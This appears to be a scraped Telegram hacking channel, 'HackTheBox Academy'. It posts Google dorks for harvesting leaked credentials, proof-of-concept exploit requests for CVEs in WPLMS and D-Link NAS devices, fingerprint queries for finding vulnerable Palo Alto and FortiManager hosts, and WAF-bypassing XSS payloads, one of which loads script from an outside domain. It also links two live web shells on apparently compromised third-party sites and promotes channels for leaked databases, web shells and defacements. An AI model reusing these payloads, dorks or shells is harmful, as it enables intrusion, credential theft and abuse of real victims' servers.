en
Feedback
HackTheBox Academy

HackTheBox Academy

Closed channel

🔴Learn About #Linux 🔴Learn About #Windows 🔴Learn About #CVE 🔴Learn About #EXPLOIT 🔴Learn About #Vulnerability ✅ADMIN : @NullByte0x1

Show more
3 327
Subscribers
No data24 hours
-207 days
-9330 days
Posts Archive
🎩 About 100 Google Dork For Recon to Find Secret and Access_Tokens And Password:
"target.com" ".mlab.com password" "target.com" "access_key" "target.com" "access_token" "target.com" "amazonaws" "target.com" "api.googlemaps AIza" "target.com" "api_key" "target.com" "api_secret" "target.com" "apidocs" "target.com" "apikey" "target.com" "apiSecret" "target.com" "app_key" "target.com" "app_secret" "target.com" "appkey" "target.com" "appkeysecret" "target.com" "application_key" "target.com" "appsecret" "target.com" "appspot" "target.com" "auth" "target.com" "auth_token" "target.com" "authorizationToken" "target.com" "aws_access" "target.com" "aws_access_key_id" "target.com" "aws_key" "target.com" "aws_secret" "target.com" "aws_token" "target.com" "AWSSecretKey" "target.com" "bashrc password" "target.com" "bucket_password" "target.com" "client_secret" "target.com" "cloudfront" "target.com" "codecov_token" "target.com" "config" "target.com" "conn.login" "target.com" "connectionstring" "target.com" "consumer_key" "target.com" "credentials" "target.com" "database_password" "target.com" "db_password" "target.com" "db_username" "target.com" "dbpasswd" "target.com" "dbpassword" "target.com" "dbuser" "target.com" "dot-files" "target.com" "dotfiles" "target.com" "encryption_key" "target.com" "fabricApiSecret" "target.com" "fb_secret" "target.com" "firebase" "target.com" "ftp" "target.com" "gh_token" "target.com" "github_key" "target.com" "github_token" "target.com" "gitlab" "target.com" "gmail_password" "target.com" "gmail_username" "target.com" "herokuapp" "target.com" "internal" "target.com" "irc_pass" "target.com" "JEKYLL_GITHUB_TOKEN" "target.com" "key" "target.com" "keyPassword" "target.com" "ldap_password" "target.com" "ldap_username" "target.com" "login" "target.com" "mailchimp" "target.com" "mailgun" "target.com" "master_key" "target.com" "mydotfiles" "target.com" "mysql" "target.com" "node_env" "target.com" "npmrc _auth" "target.com" "oauth_token" "target.com" "pass" "target.com" "passwd" "target.com" "password" "target.com" "passwords" "target.com" "pem private" "target.com" "preprod" "target.com" "private_key" "target.com" "prod" "target.com" "pwd" "target.com" "pwds" "target.com" "rds.amazonaws.com password" "target.com" "redis_password" "target.com" "root_password" "target.com" "secret" "target.com" "secret.password" "target.com" "secret_access_key" "target.com" "secret_key" "target.com" "secret_token" "target.com" "secrets" "target.com" "secure" "target.com" "security_credentials" "target.com" "send.keys" "target.com" "send_keys" "target.com" "sendkeys" "target.com" "SF_USERNAME salesforce" "target.com" "sf_username" "target.com" "FIREBASE_API_JSON=" "target.com" " vim_settings.xml" "target.com" "slack_api" "target.com" "slack_token" "target.com" "sql_password" "target.com" "ssh" "target.com" "ssh2_auth_password" "target.com" "sshpass" "target.com" "staging" "target.com" "stg" "target.com" "storePassword" "target.com" "stripe" "target.com" "swagger" "target.com" "testuser" "target.com" "token" "target.com" "x-api-key" "target.com" "xoxb " "target.com" "xoxp"
#Ethical_Hacker #Pentest #Recon ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

↔️ CVE-2024-48990 ❗️ Qualys discovered that needrestart, before version 3.8, allows local attackers to execute arbitrary code
↔️ CVE-2024-48990 ❗️ Qualys discovered that needrestart, before version 3.8, allows local attackers to execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable. 🖥 Exploit - POC #Ethical_Hacker #Exploit #Vulnerability #CVE #Pentest #Privilege_Escalation ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

http://grabatic.net Web.Archive For My Friends. As You Can See In The Channel History, Im Not A Defacer. This Is Only For My
http://grabatic.net Web.Archive
For My Friends. As You Can See In The Channel History, Im Not A Defacer. This Is Only For My Fun Times And When I Don't Have Anything Important To Do Like Study Or Practice.
I'm bored. #Fun_Time 😂

↔️ CVE-2024-0012 _ CVE-20249474 ❗️Authentication Bypass and Authenticated Command Injection in Palo Alto PAN-OS 🖥 Nuclei_Tem
↔️ CVE-2024-0012 _ CVE-20249474 ❗️Authentication Bypass and Authenticated Command Injection in Palo Alto PAN-OS 🖥 Nuclei_Templates 🖥 POC - Exploit 🖥 Metasploit_Exploit 🔎 Fofa:
body="Panos.browser.cookie.set"
🔎Hunter.how:
product.name="Palo Alto"
#CVE #Exploit #Vulnerability #Ethical_Hacker #Pentest #POC ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

#XSS payloads to bypass WAF in URL context. HTML + Double Encoding + Embedded bytes. 1.
JavaScript:"<Svg/OnLoad=alert%25%0A26lpar;1)>"
2.
JavaScript:"\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>"
3.
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
#XSS #Exploit #Vulnerability #Ethical_Hacker #Pentest #WEB ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

🟧 2 Shell Access For Practice. ❌ Plz dont remove the $SHELL, So EveryOne Can Use https://rahatek.com/h3x.php https://uk.revi
🟧 2 Shell Access For Practice. ❌ Plz dont remove the $SHELL, So EveryOne Can Use https://rahatek.com/h3x.php https://uk.reviewstel.com/.well-known/pki-validation/.H3X.php

↔️ CVE-2024-47575 ❗️A missing authentication for critical function in FortiManager allows attacker to execute arbitrary code
↔️ CVE-2024-47575 ❗️A missing authentication for critical function in FortiManager allows attacker to execute arbitrary code or commands via specially crafted requests. 🖥 POC - Exploit 🔎 Fofa:
app="FORTINET-FortiManager"
🔎 Hunter.How
ip.port=="541"&&protocol.banner="xab"&&protocol.banner="fortinet"
🔎 ZoomEye:
title="FortiManager"
#CVE #Exploit #Vulnerability #Ethical_Hacker #Pentest #POC ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

We made New Channel For Our Nasty Items To prevent blocking This Channel From Telegram. #Leaked_Database #WebShells #defaceme
We made New Channel For Our Nasty Items To prevent blocking This Channel From Telegram. #Leaked_Database #WebShells #defacement_Archive https://t.me/HackTheBox_DataBase

↔️ CVE-2024-10470 ❗️WPLMS Learning Management System for WordPress &lt;= 4.962 – Unauthenticated Arbitrary File Read and Dele
↔️ CVE-2024-10470 ❗️WPLMS Learning Management System for WordPress <= 4.962 – Unauthenticated Arbitrary File Read and Deletion 👩‍💻 POC:
POST /wp-content/themes/wplms/setup/installer/envato-setup-export.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

download_export_zip=1&zip_file=.htaccess
🔎fofa.info:
body="/wp-content/plugins/wplms_plugin/"
#CVE #Exploit #Vulnerability #Ethical_Hacker #Pentest #POC ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

🩸🩸🫵🩸🩸🩸 💥 🕷 Practical Phishing Campaigns. #Ethical_Hacker #Course #Red_Team #Pentest #Hacking #Phishing ➖➖➖➖➖➖➖➖➖ 🌐 @
🩸🩸🫵🩸🩸🩸 💥 🕷 Practical Phishing Campaigns. #Ethical_Hacker #Course #Red_Team #Pentest #Hacking  #Phishing ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

↔️ CVE-2024-10914 ❗️A command injection vulnerability has been identified in the account_mgr.cgi URI of certain D-Link NAS de
↔️ CVE-2024-10914 ❗️A command injection vulnerability has been identified in the account_mgr.cgi URI of certain D-Link NAS devices. 👩‍💻 POC:
curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"
🔎fofa.info:
app="D_Link-DNS-ShareCenter"
#CVE #Exploit #Vulnerability #Ethical_Hacker #Pentest #POC ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

🌎 How To Put Hidden Messages in Pictures. #Course #Ethical_Hacker #Steganography #Security ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

📌 The Web Application Hacker's Handbook #BOOK #Pentest #Ethical_Hacker #Web #Hacking #Red_Team #Security ➖➖➖➖➖➖➖➖➖ 🌐 @HackT
📌  The Web Application Hacker's Handbook #BOOK #Pentest #Ethical_Hacker #Web #Hacking #Red_Team #Security ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

#Fortinet_Fortigate_XSS_Bypass. #XSS #Ethical_Hacker #Web #Waf #Bypass #Pentest ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheB
#Fortinet_Fortigate_XSS_Bypass. <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a()%20x> #XSS #Ethical_Hacker #Web #Waf #Bypass #Pentest ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security